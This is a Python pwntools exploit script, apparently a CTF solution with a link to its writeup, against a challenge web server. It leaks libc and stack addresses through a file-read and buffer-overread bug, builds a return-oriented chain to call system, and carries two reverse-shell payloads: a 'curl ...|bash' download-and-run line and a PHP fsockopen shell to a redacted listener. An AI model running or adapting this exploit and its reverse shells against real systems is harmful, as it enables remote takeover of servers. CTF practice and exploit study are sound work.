
```python
from pwn import *
import requests,re

# Base URL of the challenge web server; every request below is built from it.
url = "http://134.175.185.244"

# One shared HTTP session, so the cookie set by login() is sent with the
# later /select.php requests.
session = requests.Session()

# Local copy of the libc build, loaded with pwntools. It supplies symbol
# offsets (e.g. system); its base address is assigned later from the
# /proc/self/maps leak.
libc = ELF("./libc.so")

def login():
    """Log the shared session in as the challenge's admin user.

    Posts the login form to /index.php with the credentials hard-coded
    below. The response is discarded, so this function does not confirm
    that the login succeeded.
    """
    form = {"password":"goodlucktoyou","submit":"submit","username":"admin"}
    login_url = url + "/index.php"
    session.post(login_url, data=form)

def send(payload):
    """Submit *payload* as the search field and return the echoed result.

    Posts to /select.php and returns the first piece of the response body
    found between the closing form tag and the next <br>. Raises
    IndexError when the response contains no such piece.

    NOTE(review): a str pattern is applied to response.content, so the
    script assumes Python 2 string semantics.
    """
    form = {"submit":"submit","search":payload}
    reply = session.post(url + "/select.php", data=form)
    echoed = re.findall('\<\/form\>(.*?)\<br\>', reply.content)
    return echoed[0]

def read(payload):
    """Submit *payload* as the search field and return the raw result text.

    Same request as send(), but the result is cut out of the response by
    position rather than by pattern: the first 1517 + len(payload) bytes
    and the final byte are dropped. The script calls this with a file path
    (/proc/self/maps) and parses the returned text as that file's content.
    """
    form = {"submit":"submit","search":payload}
    reply = session.post(url + "/select.php", data=form)
    # 1517 is a hard-coded offset; presumably the length of the page markup
    # that precedes the echoed payload -- confirm against the target page.
    start = 1517 + len(payload)
    body = reply.content
    return body[start:-1]

login()

# leak libc and stack
#
# libc base: fetch /proc/self/maps through read() and take the first 12
# characters of the first line that names libc-2.28, i.e. the start address
# of that mapping, as the load address of libc.
maps_text = read("/proc/self/maps")
libc_line_prefix = re.findall('(.*?)libc-2.28', maps_text)[0]
libc.address = int('0x' + libc_line_prefix[:12], 16)

# stack pointer: send 0x64 filler bytes and keep whatever the page echoes
# after them. Those trailing bytes are padded to 8 and decoded as a
# little-endian 64-bit value. Presumably the server-side buffer is not
# NUL-terminated after 0x64 bytes, so adjacent stack data is echoed too.
echoed = send('a'*0x64)
stack = u64(echoed[0x64:].ljust(8, b'\0'))

log.warn("stack: "+str(hex(stack)))
log.warn("libc: "+str(hex(libc.address)))

# gadget
# Fixed offsets inside this libc build, rebased onto the leaked load address.
# Going by the names, the first is a `pop rdi; ret` sequence and the second
# pops four values before returning. The offsets only hold for the exact
# libc binary loaded above.
libc_base = libc.address
pop_rdi = libc_base + 0x023a5f
pop4_ret = libc_base + 0x024568

def attack1():
    """First payload variant (defined here but not called by this script).

    Layout: 0x88 filler bytes, then three 8-byte values (the pop_rdi
    gadget, the pointer stack+0xa0, the address of system), then a
    NUL-terminated shell command. The command starts 0xa0 bytes into the
    payload (0x88 + 3*8), which matches the stack+0xa0 pointer placed in
    the chain as system's argument.
    """
    filler = "a"*0x88
    chain = p64(pop_rdi) + p64(stack+0xa0) + p64(libc.symbols['system'])
    # x.x.x.x:8888 is the author's redacted listener address.
    command = "curl https://shell.now.sh/x.x.x.x:8888|bash\x00"
    send(filler + chain + command)

def attack2():
    """Second payload variant, the one this script actually runs.

    Layout: a NUL-terminated shell command at the very start of the buffer,
    space-padded to 0x88 bytes; then ten copies of the pop_rdi gadget
    address, the pop4_ret gadget and four zero qwords; then the final
    chain (pop_rdi, the leaked stack pointer, the address of system).
    Here system's argument is `stack` itself, i.e. the start of the
    buffer where the command was placed. The page does not explain why
    the repeated gadget entries are needed; see the original writeup.
    """
    # x.x.x.x:8888 is the author's redacted listener address.
    command = "php -r '$sock=fsockopen(\"x.x.x.x\",8888);exec(\"bash -i <&3 >&3 2>&3\");'\x00"
    padded_command = command.ljust(0x88)
    slide = p64(pop_rdi)*10+p64(pop4_ret)+p64(0)*4
    chain = p64(pop_rdi)+p64(stack)+p64(libc.symbols['system'])
    send(padded_command + slide + chain)

# Only the second variant is executed.
attack2()
```

Original writeup (https://xuanxuanblingbling.github.io/ctf/pwn/2020/05/05/mixture/).